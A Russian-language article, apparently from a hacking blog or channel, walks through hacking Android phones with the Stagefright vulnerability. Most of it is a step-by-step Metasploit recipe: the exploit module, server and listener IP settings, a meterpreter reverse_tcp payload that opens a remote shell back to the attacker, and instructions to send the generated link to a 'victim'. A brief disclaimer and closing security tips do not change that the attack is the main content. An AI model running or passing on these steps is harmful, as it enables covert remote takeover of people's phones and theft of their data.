Вступить в наш чат
Ваш телефон может рассказать о вас гораздо больше, чем вы думаете. И если ваша личная информация попадет в руки третьих лиц, то это может иметь катастрофические последствия. Злоумышленники придумывают все новые способы мониторинга мобильных устройств, и зачастую они используют уязвимости в операционной системе.
Сегодня мы покажем вам на примере одной такой уязвимости, как хакеры взламывают андроид. Суть этого метода проста: жертва открывает вредоносную ссылку, и её телефон автоматически взламывается. Не верите? Тогда читайте до конца.
Дисклеймер: Данная статья представлена исключительно в образовательных целях для информирования читателей о взломах. Мы не несём ответственности за любые ваши действия.
Как работает взлом
Эксплойт Stagefright - это критическая уязвимость в Android, которая была обнаружена исследователем кибербезопасности из Zimperium. Эта уязвимость представляет собой тип атаки переполнения буфера. Плюсом эксполойта является его удаленность. Хакер отправляет вредоносную ссылку на файл, при нажатии на которую происходит сбой библиотеки stagefright, а затем процесс перезапускается обратно на сервер, и устройство взламывается, а пользователь даже не догадывается об этом.
А теперь давайте на практике посмотрим, как это все дело работает.
Взлом Android ссылкой
Шаг 1: Загрузите Kali Linux.
Запустите свой компьютер с Kali Linux и откройте Metasploit.
Шаг 2: Настройте Metasploit для использования эксплойта Stagefright.
Чтобы настроить Metasploit, введите команды в консоли msf:
use exploit/android/browser/stagefright_mp4_tx3g_64bit
Затем введите следующее:
set SRVHOST 192.168.182.136 (здесь ваш IP)
Теперь введите:
set URIPATH /
Вам нужно установить полезную нагрузку для этого типа с помощью следующей команды:
set payload linux/armle/meterpreter/reverse_tcp
Установите свой IP-адрес:
set lhost 192.168.182.136 (здесь ваш IP)
Введите эту команду для подробного режима:
set verbose true exploit -j
Шаг 3: Отправьте вредоносную ссылку жертве.
В нашем случае ссылка получилась такой:
http://192.168.182.136:8080/
Как только жертва нажмет на ссылку, ее телефон будет взломан. И вы сможете управлять им удаленно с помощью эксплойта stagefright.
Советы по безопасности
Вот несколько советов, которые вы можете использовать для предотвращения взлома телефона:
- Не открывайте ссылки, отправленные в текстовых сообщениях и электронных письмах, без проверки источника;
- Устанавливайте приложения только из официального магазина игр. Не открывайте неизвестные ссылки и файлы, которым вы не доверяете;
- Не подключайте телефон к общедоступной сети Wi-Fi без использования VPN;
- Регулярно обновляйте ваше устройство. Данная уязвимость уже исправлена разработчиками, поэтому проверьте ваше устройство на наличие последних обновлений;
- Установите хороший антивирус на свое устройство Android.